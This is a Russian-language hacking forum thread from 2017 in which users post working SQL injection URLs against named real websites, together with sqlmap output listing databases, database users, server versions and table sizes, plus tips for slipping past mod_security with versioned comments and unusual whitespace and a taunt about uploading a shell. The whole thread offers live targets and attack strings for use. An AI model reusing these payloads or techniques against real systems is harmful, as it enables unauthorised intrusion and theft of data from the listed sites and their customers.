ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.08.2017, 15:09
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
Сообщение от SlipX
SlipX said:
↑
не смог докрутить, blind
Код:
Code:
http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0)having+avg(0)%23
MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key')
Где ж тут Blind? Или Вы всегда полагаетесь только на sqlmap? И да, там присутствует Mod_security, потому используем нестандартные пробелы и загоняем операторы в комментарии с версией(пример /*!12345union*/%0aselect)!
|
|
|

13.08.2017, 02:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 20604
Репутация:
18
|
|
простите за флуд, но на кой хер выставлять ссылки на уязвимые сайты если ты элементарно не можешь эту уязвимость раскрутить?
а теперь по теме:
Код:
Code:
http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21--
|
|
|
|

14.08.2017, 02:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 70303
Репутация:
145
|
|
target: http://www.tissueeng.net
type:SQL Injection
Код:
Code:
http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+
user: tissueen_erikp@localhost
version:5.6.32-78.1-log
|
|
|
|

19.08.2017, 01:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 6356
Репутация:
0
|
|
.SpoilerTarget" type="button">Spoiler
http://www.kandiusa.com/product_list.php?id=1
Database: kandiusa
+---------+---------+
| Table | Entries |
+---------+---------+
| custom | 8877 |
| product | 4703 |
| orderm | 3843 |
| parts | 597 |
| class | 372 |
| sort | 76 |
| wty | 3 |
| admn | 2 |
| reg | 1 |
+---------+---------+
.SpoilerTarget" type="button">Spoiler: bd
http://www.cambridgesilversmiths.com...il.php?id=2504
available databases [48]:
[*] CamSilWeb
[*] Crystal
[*] cs_dev_ecommSQL
[*] cs_ecommSQL
[*] CZOC
[*] d2
[*] Data_005
[*] DATA_020
[*] DATA_021
[*] DATA_022
[*] DATA_55
[*] DATA_56
[*] DATA_999_ARCHIVE
[*] DATA_ARCHIVE
[*] DataLF
[*] DemoSynergy
[*] distribution
[*] EDI_2
[*] EDI_CS_TEMP
[*] EEDI_CS
[*] FedEx
[*] GENTRANDatabase
[*] Issues
[*] KS_Inbox
[*] KS_Object
[*] master
[*] model
[*] msdb
[*] msllockdb
[*] Northwind
[*] pubs
[*] PWE
[*] Screens
[*] Spanish
[*] swWorkFlow
[*] Synergy
[*] TaxTables
[*] tempdb
[*] Ticketing
[*] UPS
[*] vendor_dev
[*] vendor_test
[*] VendorLF
[*] vpEDI_Company
[*] zWMS_CA
[*] zWMS_dev
[*] zWMS_PreMigration
[*] zWMS_Test_NJ
[COLOR="rgb(187, 187, 187)"]http://www.pinoy-market.com/store.php?id=136
available databases [5]:
[*] information_schema
[*] mysql
[*] ofertas
[*] pinoy
[*] test[/COLOR]
[COLOR="rgb(187, 187, 187)"]http://www.ecgi.de/wp/wp_id.php?id=213
available databases [3]:
[*] db1081552-ecgi1
[*] db1081552-ecgi2
[*] information_schema[/COLOR]
Http://www.kupa.pl/pl/humor.php?id=16
available databases [1]:
[*] baza777
// Не надо флудить однообразными сообщениями.
// Объединяй в 1 пост, не создавай модераторам лишней работы
// ВВ
|
|
|
|

19.08.2017, 21:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 6356
Репутация:
0
|
|
tvet.ps/home.php?org=43
available databases [2]:
[*] information_schema
[*] tvetps_db
|
|
|
|

13.09.2017, 20:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 20604
Репутация:
18
|
|
Код:
Code:
http://www.pizzifarm.com/printerfriendly.php?id=-25+union+select+version()+--+
4.1.20
|
|
|
|

20.09.2017, 23:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 20604
Репутация:
18
|
|
ЗАО НПЦ «АСПЕКТ»
Код:
Code:
http://aspect.dubna.ru/new/news.php?id=-222+union+select+@@version--
|
|
|
|

04.10.2017, 21:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 56255
Репутация:
2
|
|
Код:
Code:
http://www.immobilien-bender.com/download_blob.php?ID_KATALOG_FILE=99' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x556a6d655550696468517a6654417a59597750744f654b7164566e64624876594f58704345774b72,0x7170706a71),NULL,NULL,NULL,NULL,NULL-- WNxl
|
|
|
|

06.10.2017, 00:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 6356
Репутация:
0
|
|
http://mycompaniesact.com/orders.php?id=401
Код:
Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=401' AND 5514=5514 AND 'bTax'='bTax
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627871,0x4975495a54675364526f6847444d55556c714d507361564a62794f486f5242756f6b65674d436f48,0x7162717a71)-- srbU
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
available databases [24]:[*] cashflow[*] cashflowblog[*] cim[*] complyzone[*] complyzoneblog[*] gstcomplyzone[*] gstseekho[*] gstseekhoapp[*] information_schema[*] mppcos[*] mycompaniesact[*] mycompaniesact_blog[*] mysql[*] performance_schema[*] permier[*] phpmyadmin[*] punitecom[*] rishab[*] sammiraman[*] ssluthra[*] trackmyinvoice[*] uniqueshiksha[*] unocalecom[*] Vendor_Payment_Generation
|
|
|
|

06.10.2017, 18:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 6356
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Слабо шелл залить ?
К сожелению да, не так силен в этом незнаю с чего начать даж
Был бы кто научит)
http://www.sfgames.ru/gameS.php?id=232
Код:
Code:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=232 AND 5858=5858
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=232 AND SLEEP(5)
---
[18:55:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|